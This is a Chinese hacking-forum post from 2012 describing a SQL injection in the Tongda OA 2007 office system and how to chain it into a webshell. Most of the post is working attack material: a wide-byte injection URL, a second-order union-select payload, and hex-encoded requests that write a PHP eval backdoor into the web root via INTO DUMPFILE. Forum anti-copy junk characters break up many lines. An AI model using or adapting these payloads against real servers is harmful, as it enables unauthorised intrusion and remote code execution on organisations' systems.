找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2495|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本7 \0 i) ?1 A& c/ Q" J
0 `4 K' u: J3 U/ T" \
$ e$ ~' w' X) b8 k) {8 @/ c
Office Anywhere 2007 网络智能办公系统
# J. |7 w; |' L/ n8 @   U6 i* ?# l9 ^* p+ @7 J+ G& c% F
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
, v& P( ~- r, e3 o5 ]7 M8 s
  G% v2 W0 E$ G# y+ I
0 h! p. d+ R- p. r这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
% I, {/ I, s* a5 U5 l2 i: B ) Z. ^0 j# y$ T/ x# i
例如:SELECT * from USER where USER_ID='{$USERNAME}'  . c. e/ d6 I2 Q( s; k3 }
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
- B4 \9 C. \; Q* k# P: P: }- g $ Q( |3 d# y* N( J+ i* Y7 X1 ]
这个时候我们是不是可以组合起来使用哪?
+ Q/ m- \2 e. N+ m8 P4 Y ) w3 Z- ?* r7 W9 G
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
. h! f/ I0 u8 B  t7 nunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,107 x$ N+ E/ l$ S7 B" ]9 X% z) G, c

) f7 p, \' Z: n- _& E这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了: x7 u2 h+ x% Z+ b

3 h* v" v6 }/ [, F1 d! t# U那么问题来了,单引号可以吗?当然是不可以的,^_^。。。! L0 j) Y5 Y  o' ]% Z
5 _* o( z/ d' \3 Z1 e
那么我们用字符串格式带入进行hex编码
' M) B2 k" r! I; k0 ~  U5 | 6 ^: _+ {8 J: N& v2 |: B+ l
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%239 o+ B9 W2 k) W, t0 f  D, }  m# i
, ^& X6 |. m$ v4 l6 Y: p: H; D
测试ok,获取oa的webshell
2 ^& \: E0 Y8 ~) w9 _- D# ~0 C
# Y, L- @9 a4 ]5 O, N- L
0 u6 X9 B) \( n" z1 @" vpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23  x* m1 P* y( W8 {- _
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表